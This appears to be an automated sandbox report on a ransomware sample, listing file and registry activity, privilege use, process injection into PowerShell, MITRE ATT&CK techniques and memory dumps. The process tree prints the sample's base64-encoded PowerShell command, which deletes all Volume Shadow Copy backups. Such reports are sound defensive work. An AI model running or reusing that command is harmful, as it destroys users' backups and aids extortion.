File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_zh-tw_45ba3c3f11126d07.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_4a6381a588654ba6_dbgeng.dll_eefdd445	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-mfc42x.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c2780f07f05867be.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_en-us_d28dabacfdb4dd1a_winload.exe.mui_3bc5b827	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-sendmail.resources_31bf3856ad364e35_6.1.7600.16385_de-de_46584364f4c4d556_sendmail.dll.mui_cbac108c	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-basic-misc-tools_31bf3856ad364e35_6.1.7600.16385_none_17330d9420bf24e8.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-com-base.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4344f5fd149fa43d_ole32.dll.mui_5035d60a	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-u..erservice.resources_31bf3856ad364e35_6.1.7600.16385_de-de_47acf6dc044a06fd_umpo.dll.mui_cac12e54	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c04dbd974d3bdb01	powershell.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2688	powershell.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeBackupPrivilege	1620	vssvc.exe
Token: SeRestorePrivilege	1620	vssvc.exe
Token: SeAuditPrivilege	1620	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2268 wrote to memory of 2688	2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe	30
PID 2268 wrote to memory of 2688	2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe	30
PID 2268 wrote to memory of 2688	2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe	30
PID 2268 wrote to memory of 2688	2268	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe	30

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
"C:\Users\Admin\AppData\Local\Temp\db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2688

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2968

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\e99x17132-readme.txt
1⤵
PID:2204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\e99x17132-readme.txt

Filesize
6KB

MD5
5bdf1e0c6bd1f8a91b961fbb16494a9f

SHA1
c20960a80c93600c430947fe1ca30bf8690fa306

SHA256
d3a22da48095e308e1ec1cc1eb590e2418722f711555c1e2ed354c41b029b0a7

SHA512
936867e80614537fcc6f64285a542306a6450550508f69d281821ba82e184084df819bca280feb4af3eaef91812caec4e19b3aa8f6503f1f225e48b21e6af768

Download Submit
memory/2268-3-0x0000000002130000-0x00000000021CF000-memory.dmp

Filesize
636KB

Download
memory/2268-4-0x00000000022E0000-0x000000000240D000-memory.dmp

Filesize
1.2MB

Download
memory/2268-12-0x00000000000B0000-0x00000000000B6000-memory.dmp

Filesize
24KB

Download
memory/2268-5-0x0000000000330000-0x000000000034F000-memory.dmp

Filesize
124KB

Download
memory/2268-6-0x00000000026A0000-0x00000000027A9000-memory.dmp

Filesize
1.0MB

Download
memory/2268-7-0x00000000000B0000-0x00000000000B6000-memory.dmp

Filesize
24KB

Download
memory/2268-8-0x0000000000080000-0x0000000000081000-memory.dmp

Filesize
4KB

Download
memory/2268-9-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/2268-11-0x00000000000B0000-0x00000000000B6000-memory.dmp

Filesize
24KB

Download
memory/2268-0-0x0000000000070000-0x000000000007A000-memory.dmp

Filesize
40KB

Download
memory/2268-1-0x0000000000070000-0x000000000007A000-memory.dmp

Filesize
40KB

Download
memory/2268-2-0x0000000002060000-0x0000000002129000-memory.dmp

Filesize
804KB

Download
memory/2268-10-0x00000000000A0000-0x00000000000A1000-memory.dmp

Filesize
4KB

Download
memory/2268-26-0x00000000000A0000-0x00000000000A1000-memory.dmp

Filesize
4KB

Download
memory/2688-20-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2688-21-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

Filesize
9.6MB

Download
memory/2688-22-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

Filesize
9.6MB

Download
memory/2688-23-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

Filesize
9.6MB

Download
memory/2688-24-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

Filesize
9.6MB

Download
memory/2688-25-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

Filesize
9.6MB

Download
memory/2688-19-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2688-18-0x000007FEF6EFE000-0x000007FEF6EFF000-memory.dmp

Filesize
4KB

Download